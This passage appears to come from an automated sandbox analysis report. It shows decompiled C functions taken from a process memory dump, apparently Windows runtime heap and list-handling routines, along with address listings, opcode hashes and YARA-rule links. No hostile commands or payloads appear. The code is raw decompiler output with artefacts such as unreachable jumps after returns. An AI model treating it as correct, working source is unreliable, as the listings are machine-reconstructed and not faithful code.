							_t40 = _t78 + 0xc; // 0xc
							_t94 = _t40;
							_t90 =  *_t94;
							while(_t90 != _t94) {
								_t41 = _t90 + 8; // 0x8
								_t74 = E0169F380(_a4, _t41, 0x10);
								_t98 = _t98 + 0xc;
								if(_t74 != 0) {
									_t90 =  *_t90;
									continue;
								}
								goto L12;
							}
							_t82 = L01674620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
							if(_t82 != 0) {
								_t46 = _t78 + 0xc; // 0xc
								_t69 = _t46;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t85 =  *_t69;
								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
									L20:
									_t82 = 3;
									asm("int 0x29");
								}
								 *((intOrPtr*)(_t82 + 4)) = _t69;
								 *_t82 = _t85;
								 *((intOrPtr*)(_t85 + 4)) = _t82;
								 *_t69 = _t82;
								 *(_t78 + 8) =  *(_t78 + 8) + 1;
								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
								goto L11;
							} else {
								L18:
								_push(0xe);
								_pop(0);
							}
						} else {
							_t84 = _v8;
							_t9 = _t87 + 2; // 0x2
							_t56 = _t9;
							goto L4;
						}
					}
					L12:
					return 0;
				}
				_t10 = _t87 + 0x1a; // 0x1a
				_t78 = L01674620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
				if(_t78 == 0) {
					goto L18;
				} else {
					_t12 = _t87 + 2; // 0x2
					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
					_t16 = _t78 + 0x18; // 0x18
					E0169F3E0(_t16, _v8[2], _t87);
					 *((short*)(_t78 + _t87 + 0x18)) = 0;
					_t19 = _t78 + 0xc; // 0xc
					_t66 = _t19;
					 *((intOrPtr*)(_t66 + 4)) = _t66;
					 *_t66 = _t66;
					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
					_t81 = L01674620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
					if(_t81 == 0) {
						goto L18;
					} else {
						_t26 = _t78 + 0xc; // 0xc
						_t69 = _t26;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t85 =  *_t69;
						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
							goto L20;
						} else {
							 *((intOrPtr*)(_t81 + 4)) = _t69;
							 *_t81 = _t85;
							 *((intOrPtr*)(_t85 + 4)) = _t81;
							 *_t69 = _t81;
							_t83 = _v12;
							 *(_t78 + 8) = 1;
							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							_t34 = _t83 + 0x154; // 0x1ba
							_t69 = _t34;
							_t85 =  *_t69;
							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
								goto L20;
							} else {
								 *_t78 = _t85;
								 *((intOrPtr*)(_t78 + 4)) = _t69;
								 *((intOrPtr*)(_t85 + 4)) = _t78;
								 *_t69 = _t78;
								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							}
						}
						goto L11;
					}
				}
				goto L12;
			}





















                                                      0x0172740d
                                                      0x0172740d
                                                      0x01727412
                                                      0x01727413
                                                      0x01727416
                                                      0x01727418
                                                      0x0172741c
                                                      0x0172741f
                                                      0x01727422
                                                      0x01727422
                                                      0x01727428
                                                      0x0172742a
                                                      0x0172742a
                                                      0x01727451
                                                      0x01727432
                                                      0x0172744f
                                                      0x0172744f
                                                      0x00000000
                                                      0x01727434
                                                      0x01727438
                                                      0x01727443
                                                      0x01727517
                                                      0x01727517
                                                      0x0172751a
                                                      0x01727535
                                                      0x01727520
                                                      0x01727527
                                                      0x0172752c
                                                      0x01727531
                                                      0x01727533
                                                      0x00000000
                                                      0x01727533
                                                      0x00000000
                                                      0x01727531
                                                      0x0172754b
                                                      0x0172754f
                                                      0x0172755c
                                                      0x0172755c
                                                      0x0172755f
                                                      0x01727560
                                                      0x01727561
                                                      0x01727562
                                                      0x01727563
                                                      0x01727568
                                                      0x0172756a
                                                      0x0172756c
                                                      0x0172756d
                                                      0x0172756d
                                                      0x0172756f
                                                      0x01727572
                                                      0x01727574
                                                      0x01727577
                                                      0x0172757c
                                                      0x0172757f
                                                      0x00000000
                                                      0x01727551
                                                      0x01727551
                                                      0x01727551
                                                      0x01727553
                                                      0x01727553
                                                      0x01727449
                                                      0x01727449
                                                      0x0172744c
                                                      0x0172744c
                                                      0x00000000
                                                      0x0172744c
                                                      0x01727443
                                                      0x0172750e
                                                      0x01727514
                                                      0x01727514
                                                      0x01727455
                                                      0x01727469
                                                      0x0172746d
                                                      0x00000000
                                                      0x01727473
                                                      0x01727473
                                                      0x01727476
                                                      0x01727480
                                                      0x01727484
                                                      0x0172748e
                                                      0x01727493
                                                      0x01727493
                                                      0x01727496
                                                      0x01727499
                                                      0x017274a1
                                                      0x017274b1
                                                      0x017274b5
                                                      0x00000000
                                                      0x017274bb
                                                      0x017274c1
                                                      0x017274c1
                                                      0x017274c4
                                                      0x017274c5
                                                      0x017274c6
                                                      0x017274c7
                                                      0x017274c8
                                                      0x017274cd
                                                      0x00000000
                                                      0x017274d3
                                                      0x017274d3
                                                      0x017274d6
                                                      0x017274d8
                                                      0x017274db
                                                      0x017274dd
                                                      0x017274e0
                                                      0x017274e7
                                                      0x017274ee
                                                      0x017274ee
                                                      0x017274f4
                                                      0x017274f9
                                                      0x00000000
                                                      0x017274fb
                                                      0x017274fb
                                                      0x017274fd
                                                      0x01727500
                                                      0x01727503
                                                      0x01727505
                                                      0x01727505
                                                      0x017274f9
                                                      0x00000000
                                                      0x017274cd
                                                      0x017274b5
                                                      0x00000000

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                      • Instruction ID: ebd71f48485378822c1ea7f8f86c5b94223975b12ab2068dd6d6a4e081bc3213
                                                      • Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                      • Instruction Fuzzy Hash: 7E51BD71600646EFDB1ACF19C980A92FBB5FF55304F24C0AAE908DF212E771E946CB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01682990, Relevance: .1, Instructions: 133COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 97%
                                                      			E01682990() {
				signed int* _t62;
				signed int _t64;
				intOrPtr _t66;
				signed short* _t69;
				intOrPtr _t76;
				signed short* _t79;
				void* _t81;
				signed int _t82;
				signed short* _t83;
				signed int _t87;
				intOrPtr _t91;
				void* _t98;
				signed int _t99;
				void* _t101;
				signed int* _t102;
				void* _t103;
				void* _t104;
				void* _t107;

				_push(0x20);
				_push(0x172ff00);
				E016AD08C(_t81, _t98, _t101);
				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
				_t99 = 0;
				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
				_t82 =  *((intOrPtr*)(_t103 + 0x10));
				if(_t82 == 0) {
					_t62 = 0xc0000100;
				} else {
					 *((intOrPtr*)(_t103 - 4)) = 0;
					_t102 = 0xc0000100;
					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
					_t64 = 4;
					while(1) {
						 *(_t103 - 0x24) = _t64;
						if(_t64 == 0) {
							break;
						}
						_t87 = _t64 * 0xc;
						 *(_t103 - 0x2c) = _t87;
						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0x1631664));
						if(_t107 <= 0) {
							if(_t107 == 0) {
								_t79 = E0169E5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0x1631668)), _t82);
								_t104 = _t104 + 0xc;
								__eflags = _t79;
								if(__eflags == 0) {
									_t102 = E016D51BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0x163166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
									break;
								} else {
									_t64 =  *(_t103 - 0x24);
									goto L5;
								}
								goto L13;
							} else {
								L5:
								_t64 = _t64 - 1;
								continue;
							}
						}
						break;
					}
					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
					__eflags = _t102;
					if(_t102 < 0) {
						__eflags = _t102 - 0xc0000100;
						if(_t102 == 0xc0000100) {
							_t83 =  *((intOrPtr*)(_t103 + 8));
							__eflags = _t83;
							if(_t83 != 0) {
								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
								__eflags =  *_t83 - _t99;
								if( *_t83 == _t99) {
									_t102 = 0xc0000100;
									goto L19;
								} else {
									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
									_t66 =  *((intOrPtr*)(_t91 + 0x10));
									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
											L26:
											_t102 = E01682AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
											__eflags = _t102 - 0xc0000100;
											if(_t102 != 0xc0000100) {
												goto L12;
											} else {
												_t99 = 1;
												_t83 =  *((intOrPtr*)(_t103 - 0x20));
												goto L18;
											}
										} else {
											_t69 = E01666600( *((intOrPtr*)(_t91 + 0x1c)));
											__eflags = _t69;
											if(_t69 != 0) {
												goto L26;
											} else {
												_t83 =  *((intOrPtr*)(_t103 + 8));
												goto L18;
											}
										}
									} else {
										L18:
										_t102 = E01682C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
										L19:
										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
										goto L12;
									}
								}
								L28:
							} else {
								E0166EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
								 *((intOrPtr*)(_t103 - 4)) = 1;
								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
								_t76 = E01682AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
								__eflags = _t76 - 0xc0000100;
								if(_t76 == 0xc0000100) {
									 *((intOrPtr*)(_t103 - 0x1c)) = E01682C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
								}
								 *((intOrPtr*)(_t103 - 4)) = _t99;
								E01682ACB();
							}
						}
					}
					L12:
					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
					_t62 = _t102;
				}
				L13:
				return E016AD0D1(_t62);
				goto L28;
			}





















                                                      0x01682990
                                                      0x01682992
                                                      0x01682997
                                                      0x016829a3
                                                      0x016829a6
                                                      0x016829ab
                                                      0x016829ad
                                                      0x016829b2
                                                      0x016c5c80
                                                      0x016829b8
                                                      0x016829b8
                                                      0x016829bb
                                                      0x016829c0
                                                      0x016829c5
                                                      0x016829c6
                                                      0x016829c6
                                                      0x016829cb
                                                      0x00000000
                                                      0x00000000
                                                      0x016829cd
                                                      0x016829d0
                                                      0x016829d9
                                                      0x016829db
                                                      0x016829dd
                                                      0x01682a7f
                                                      0x01682a84
                                                      0x01682a87
                                                      0x01682a89
                                                      0x016c5ca1
                                                      0x016c5ca3
                                                      0x00000000
                                                      0x01682a8f
                                                      0x01682a8f
                                                      0x00000000
                                                      0x01682a8f
                                                      0x00000000
                                                      0x016829e3
                                                      0x016829e3
                                                      0x016829e3
                                                      0x00000000
                                                      0x016829e3
                                                      0x016829dd
                                                      0x00000000
                                                      0x016829db
                                                      0x016829e6
                                                      0x016829e9
                                                      0x016829eb
                                                      0x016829ed
                                                      0x016829f3
                                                      0x016829f5
                                                      0x016829f8
                                                      0x016829fa
                                                      0x01682a97
                                                      0x01682a9a
                                                      0x01682a9d
                                                      0x01682add
                                                      0x00000000
                                                      0x01682a9f
                                                      0x01682aa2
                                                      0x01682aa5
                                                      0x01682aa8
                                                      0x01682aab
                                                      0x016c5cab
                                                      0x016c5caf
                                                      0x016c5cc5
                                                      0x016c5cda
                                                      0x016c5cdc
                                                      0x016c5cdf
                                                      0x016c5ce5
                                                      0x00000000
                                                      0x016c5ceb
                                                      0x016c5ced
                                                      0x016c5cee
                                                      0x00000000
                                                      0x016c5cee
                                                      0x016c5cb1
                                                      0x016c5cb4
                                                      0x016c5cb9
                                                      0x016c5cbb
                                                      0x00000000
                                                      0x016c5cbd
                                                      0x016c5cbd
                                                      0x00000000
                                                      0x016c5cbd
                                                      0x016c5cbb
                                                      0x01682ab1
                                                      0x01682ab1
                                                      0x01682ac4
                                                      0x01682ac6
                                                      0x01682ac6
                                                      0x00000000
                                                      0x01682ac6
                                                      0x01682aab
                                                      0x00000000
                                                      0x01682a00
                                                      0x01682a09
                                                      0x01682a0e
                                                      0x01682a21
                                                      0x01682a24
                                                      0x01682a35
                                                      0x01682a3a
                                                      0x01682a3d
                                                      0x01682a42
                                                      0x01682a59
                                                      0x01682a59
                                                      0x01682a5c
                                                      0x01682a5f
                                                      0x01682a5f
                                                      0x016829fa
                                                      0x016829f3
                                                      0x01682a64
                                                      0x01682a64
                                                      0x01682a6b
                                                      0x01682a6b
                                                      0x01682a6d
                                                      0x01682a72
                                                      0x00000000

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 42adcf10a8eb659fb849713120bf3c79e413ed88b903d0d8dbb0aba9b677fb07
                                                      • Instruction ID: 1d4caf3e2de71bdbdf9a7d28a2228abce21893ac68f91c37b9d1651213e380b3
                                                      • Opcode Fuzzy Hash: 42adcf10a8eb659fb849713120bf3c79e413ed88b903d0d8dbb0aba9b677fb07
                                                      • Instruction Fuzzy Hash: 61514771A0021ADFDF25EF99CC90AAEBBB6BF58710F01825DE915AB310C3359952CB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01684BAD, Relevance: .1, Instructions: 131COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 85%
                                                      			E01684BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) {
				signed int _v8;
				short _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				char _v156;
				short _v158;
				intOrPtr _v160;
				char _v164;
				intOrPtr _v168;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t45;
				intOrPtr _t74;
				signed char _t77;
				intOrPtr _t84;
				char* _t85;
				void* _t86;
				intOrPtr _t87;
				signed short _t88;
				signed int _t89;

				_t83 = __edx;
				_v8 =  *0x174d360 ^ _t89;
				_t45 = _a8 & 0x0000ffff;
				_v158 = __edx;
				_v168 = __ecx;
				if(_t45 == 0) {
					L22:
					_t86 = 6;
					L12:
					E0165CC50(_t86);
					L11:
					return E0169B640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
				}
				_t77 = _a4;
				if((_t77 & 0x00000001) != 0) {
					goto L22;
				}
				_t8 = _t77 + 0x34; // 0xdce0ba00
				if(_t45 !=  *_t8) {
					goto L22;
				}
				_t9 = _t77 + 0x24; // 0x1748504
				E01672280(_t9, _t9);
				_t87 = 0x78;
				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
				E0169FA60( &_v156, 0, _t87);
				_t13 = _t77 + 0x30; // 0x3db8
				_t85 =  &_v156;
				_v36 =  *_t13;
				_v28 = _v168;
				_v32 = 0;
				_v24 = 0;
				_v20 = _v158;
				_v160 = 0;
				while(1) {
					_push( &_v164);
					_push(_t87);
					_push(_t85);
					_push(0x18);
					_push( &_v36);
					_push(0x1e);
					_t88 = E0169B0B0();
					if(_t88 != 0xc0000023) {
						break;
					}
					if(_t85 !=  &_v156) {
						L016777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
					}
					_t84 = L01674620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164);
					_v168 = _v164;
					if(_t84 == 0) {
						_t88 = 0xc0000017;
						goto L19;
					} else {
						_t74 = _v160 + 1;
						_v160 = _t74;
						if(_t74 >= 0x10) {
							L19:
							_t86 = E0165CCC0(_t88);
							if(_t86 != 0) {
								L8:
								 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
								_t30 = _t77 + 0x24; // 0x1748504
								E0166FFB0(_t77, _t84, _t30);
								if(_t84 != 0 && _t84 !=  &_v156) {
									L016777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
								}
								if(_t86 != 0) {
									goto L12;
								} else {
									goto L11;
								}
							}
							L6:
							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
							if(_v164 != 0) {
								_t83 = _t84;
								E01684F49(_t77, _t84);
							}
							goto L8;
						}
						_t87 = _v168;
						continue;
					}
				}
				if(_t88 != 0) {
					goto L19;
				}
				goto L6;
			}


























                                                      0x01684bad
                                                      0x01684bbf
                                                      0x01684bc2
                                                      0x01684bc6
                                                      0x01684bcd
                                                      0x01684bd9
                                                      0x016c67fe
                                                      0x016c6800
                                                      0x01684ccc
                                                      0x01684ccd
                                                      0x01684cb7
                                                      0x01684cc9
                                                      0x01684cc9
                                                      0x01684bdf
                                                      0x01684be5
                                                      0x00000000
                                                      0x00000000
                                                      0x01684beb
                                                      0x01684bef
                                                      0x00000000
                                                      0x00000000
                                                      0x01684bf5
                                                      0x01684bf9
                                                      0x01684c06
                                                      0x01684c0b
                                                      0x01684c17
                                                      0x01684c1c
                                                      0x01684c1f
                                                      0x01684c25
                                                      0x01684c33
                                                      0x01684c3d
                                                      0x01684c40
                                                      0x01684c43
                                                      0x01684c47
                                                      0x01684c4d
                                                      0x01684c53
                                                      0x01684c54
                                                      0x01684c55
                                                      0x01684c56
                                                      0x01684c5b
                                                      0x01684c5c
                                                      0x01684c63
                                                      0x01684c6b
                                                      0x00000000
                                                      0x00000000
                                                      0x016c6776
                                                      0x016c6784
                                                      0x016c6784
                                                      0x016c679f
                                                      0x016c67a7
                                                      0x016c67af
                                                      0x016c67ce
                                                      0x00000000
                                                      0x016c67b1
                                                      0x016c67b7
                                                      0x016c67b8
                                                      0x016c67c1
                                                      0x016c67d3
                                                      0x016c67d9
                                                      0x016c67dd
                                                      0x01684c94
                                                      0x01684c94
                                                      0x01684c98
                                                      0x01684c9c
                                                      0x01684ca3
                                                      0x016c67f4
                                                      0x016c67f4
                                                      0x01684cb5
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x01684cb5
                                                      0x01684c79
                                                      0x01684c7e
                                                      0x01684c89
                                                      0x01684c8b
                                                      0x01684c8f
                                                      0x01684c8f
                                                      0x00000000
                                                      0x01684c89
                                                      0x016c67c3
                                                      0x00000000
                                                      0x016c67c3
                                                      0x016c67af
                                                      0x01684c73
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6bd25eff04d3903d424e9930faa65c0297cb9824d30401b3f6a1fca7757eb3b6
                                                      • Instruction ID: 18637462efa15498532e8fd0e64803445227893ba956fc49dba7ca446b7371b3
                                                      • Opcode Fuzzy Hash: 6bd25eff04d3903d424e9930faa65c0297cb9824d30401b3f6a1fca7757eb3b6
                                                      • Instruction Fuzzy Hash: 3441A735A002299BDB31EF68CD40BFA77B9EF45710F0105A9E908AB341DB74DE45CB95
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01684D3B, Relevance: .1, Instructions: 131COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 78%
                                                      			E01684D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				char _v176;
				char _v177;
				char _v184;
				intOrPtr _v192;
				intOrPtr _v196;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t42;
				char* _t44;
				intOrPtr _t46;
				intOrPtr _t50;
				char* _t57;
				intOrPtr _t59;
				intOrPtr _t67;
				signed int _t69;

				_t64 = __edx;
				_v12 =  *0x174d360 ^ _t69;
				_t65 = 0xa0;
				_v196 = __edx;
				_v177 = 0;
				_t67 = __ecx;
				_v192 = __ecx;
				E0169FA60( &_v176, 0, 0xa0);
				_t57 =  &_v176;
				_t59 = 0xa0;
				if( *0x1747bc8 != 0) {
					L3:
					while(1) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t67 = _v192;
						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
						_push( &_v184);
						_push(_t59);
						_push(_t57);
						_push(0xa0);
						_push(_t57);
						_push(0xf);
						_t42 = E0169B0B0();
						if(_t42 != 0xc0000023) {
							break;
						}
						if(_v177 != 0) {
							L016777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
						}
						_v177 = 1;
						_t44 = L01674620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
						_t59 = _v184;
						_t57 = _t44;
						if(_t57 != 0) {
							continue;
						} else {
							_t42 = 0xc0000017;
							break;
						}
					}
					if(_t42 != 0) {
						_t65 = E0165CCC0(_t42);
						if(_t65 != 0) {
							L10:
							if(_v177 != 0) {
								if(_t57 != 0) {
									L016777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
								}
							}
							_t46 = _t65;
							L12:
							return E0169B640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
						}
						L7:
						_t50 = _a4;
						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
						if(_t50 != 3) {
							if(_t50 == 2) {
								goto L8;
							}
							L9:
							if(E0169F380(_t67 + 0xc, 0x1635138, 0x10) == 0) {
								 *0x17460d8 = _t67;
							}
							goto L10;
						}
						L8:
						_t64 = _t57 + 0x28;
						E01684F49(_t67, _t57 + 0x28);
						goto L9;
					}
					_t65 = 0;
					goto L7;
				}
				if(E01684E70(0x17486b0, 0x1685690, 0, 0) != 0) {
					_t46 = E0165CCC0(_t56);
					goto L12;
				} else {
					_t59 = 0xa0;
					goto L3;
				}
			}




















                                                      0x01684d3b
                                                      0x01684d4d
                                                      0x01684d53
                                                      0x01684d58
                                                      0x01684d65
                                                      0x01684d6c
                                                      0x01684d71
                                                      0x01684d77
                                                      0x01684d7f
                                                      0x01684d8c
                                                      0x01684d8e
                                                      0x01684dad
                                                      0x01684db0
                                                      0x01684db7
                                                      0x01684db8
                                                      0x01684db9
                                                      0x01684dba
                                                      0x01684dbb
                                                      0x01684dc1
                                                      0x01684dc8
                                                      0x01684dcc
                                                      0x01684dd5
                                                      0x01684dde
                                                      0x01684ddf
                                                      0x01684de0
                                                      0x01684de1
                                                      0x01684de6
                                                      0x01684de7
                                                      0x01684de9
                                                      0x01684df3
                                                      0x00000000
                                                      0x00000000
                                                      0x016c6c7c
                                                      0x016c6c8a
                                                      0x016c6c8a
                                                      0x016c6c9d
                                                      0x016c6ca7
                                                      0x016c6cac
                                                      0x016c6cb2
                                                      0x016c6cb9
                                                      0x00000000
                                                      0x016c6cbf
                                                      0x016c6cbf
                                                      0x00000000
                                                      0x016c6cbf
                                                      0x016c6cb9
                                                      0x01684dfb
                                                      0x016c6ccf
                                                      0x016c6cd3
                                                      0x01684e32
                                                      0x01684e39
                                                      0x016c6ce0
                                                      0x016c6cf2
                                                      0x016c6cf2
                                                      0x016c6ce0
                                                      0x01684e3f
                                                      0x01684e41
                                                      0x01684e51
                                                      0x01684e51
                                                      0x01684e03
                                                      0x01684e03
                                                      0x01684e09
                                                      0x01684e0f
                                                      0x01684e57
                                                      0x00000000
                                                      0x00000000
                                                      0x01684e1b
                                                      0x01684e30
                                                      0x01684e5b
                                                      0x01684e5b
                                                      0x00000000
                                                      0x01684e30
                                                      0x01684e11
                                                      0x01684e11
                                                      0x01684e16
                                                      0x00000000
                                                      0x01684e16
                                                      0x01684e01
                                                      0x00000000
                                                      0x01684e01
                                                      0x01684da5
                                                      0x016c6c6b
                                                      0x00000000
                                                      0x01684dab
                                                      0x01684dab
                                                      0x00000000
                                                      0x01684dab

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6168cbbd484114ce14fb3c663a04ac01f291449b6f1cf065fcaad47241012b54
                                                      • Instruction ID: 263e7e038778526b521c7c428c8b1fe2de2029af3c02a943afeee384a789eea5
                                                      • Opcode Fuzzy Hash: 6168cbbd484114ce14fb3c663a04ac01f291449b6f1cf065fcaad47241012b54
                                                      • Instruction Fuzzy Hash: 9D41E371A40319AFEB32EF18CC84F6AB7AAEB54710F00419EE9469B381DB70DD40CB95
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0171AA16, Relevance: .1, Instructions: 120COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E0171AA16(void* __ecx, intOrPtr __edx, signed int _a4, short _a8) {
				intOrPtr _v8;
				char _v12;
				signed int _v16;
				signed char _v20;
				intOrPtr _v24;
				char* _t37;
				void* _t47;
				signed char _t51;
				void* _t53;
				char _t55;
				intOrPtr _t57;
				signed char _t61;
				intOrPtr _t75;
				void* _t76;
				signed int _t81;
				intOrPtr _t82;

				_t53 = __ecx;
				_t55 = 0;
				_v20 = _v20 & 0;
				_t75 = __edx;
				_t81 = ( *(__ecx + 0xc) | _a4) & 0x93000f0b;
				_v24 = __edx;
				_v12 = 0;
				if((_t81 & 0x01000000) != 0) {
					L5:
					if(_a8 != 0) {
						_t81 = _t81 | 0x00000008;
					}
					_t57 = E0171ABF4(_t55 + _t75, _t81);
					_v8 = _t57;
					if(_t57 < _t75 || _t75 > 0x7fffffff) {
						_t76 = 0;
						_v16 = _v16 & 0;
					} else {
						_t59 = _t53;
						_t76 = E0171AB54(_t53, _t75, _t57, _t81 & 0x13000003,  &_v16);
						if(_t76 != 0 && (_t81 & 0x30000f08) != 0) {
							_t47 = E0171AC78(_t53, _t76, _v24, _t59, _v12, _t81, _a8);
							_t61 = _v20;
							if(_t61 != 0) {
								 *(_t47 + 2) =  *(_t47 + 2) ^ ( *(_t47 + 2) ^ _t61) & 0x0000000f;
								if(E016FCB1E(_t61, _t53, _t76, 2, _t47 + 8) < 0) {
									L016777F0(_t53, 0, _t76);
									_t76 = 0;
								}
							}
						}
					}
					_t82 = _v8;
					L16:
					if(E01677D50() == 0) {
						_t37 = 0x7ffe0380;
					} else {
						_t37 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t37 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E0171131B(_t53, _t76, _t82, _v16);
					}
					return _t76;
				}
				_t51 =  *(__ecx + 0x20);
				_v20 = _t51;
				if(_t51 == 0) {
					goto L5;
				}
				_t81 = _t81 | 0x00000008;
				if(E016FCB1E(_t51, __ecx, 0, 1,  &_v12) >= 0) {
					_t55 = _v12;
					goto L5;
				} else {
					_t82 = 0;
					_t76 = 0;
					_v16 = _v16 & 0;
					goto L16;
				}
			}



















                                                      0x0171aa1f
                                                      0x0171aa21
                                                      0x0171aa23
                                                      0x0171aa2b
                                                      0x0171aa30
                                                      0x0171aa36
                                                      0x0171aa39
                                                      0x0171aa42
                                                      0x0171aa75
                                                      0x0171aa7a
                                                      0x0171aa7c
                                                      0x0171aa7c
                                                      0x0171aa88
                                                      0x0171aa8a
                                                      0x0171aa8f
                                                      0x0171ab02
                                                      0x0171ab04
                                                      0x0171aa99
                                                      0x0171aaa8
                                                      0x0171aaaf
                                                      0x0171aab3
                                                      0x0171aacc
                                                      0x0171aad1
                                                      0x0171aad6
                                                      0x0171aae0
                                                      0x0171aaf3
                                                      0x0171aaf9
                                                      0x0171aafe
                                                      0x0171aafe
                                                      0x0171aaf3
                                                      0x0171aad6
                                                      0x0171aab3
                                                      0x0171ab07
                                                      0x0171ab0a
                                                      0x0171ab11
                                                      0x0171ab23
                                                      0x0171ab13
                                                      0x0171ab1c
                                                      0x0171ab1c
                                                      0x0171ab2b
                                                      0x0171ab44
                                                      0x0171ab44
                                                      0x0171ab51
